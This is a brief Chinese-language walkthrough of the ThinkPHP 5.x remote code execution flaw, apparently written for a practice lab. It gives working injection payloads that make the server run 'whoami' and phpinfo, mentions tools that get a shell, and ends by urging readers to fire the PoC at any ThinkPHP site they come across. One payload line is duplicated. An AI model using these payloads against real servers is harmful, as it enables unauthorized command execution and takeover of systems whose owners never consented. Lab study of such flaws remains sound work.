Thinkphp5x远程命令执行及getshell
开启环境,访问靶场
可以用工具进行检测是否存在漏洞

存在漏洞可以直接用工具get shell

也可以手工操作

远程代码执行whoami
POC:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
1][]=-1
Thinkphp被曝很多漏洞,截至目前位置3x -- 6x的各个版本都被爆有大量漏洞,遇到TP的
站,直接打poc就可以了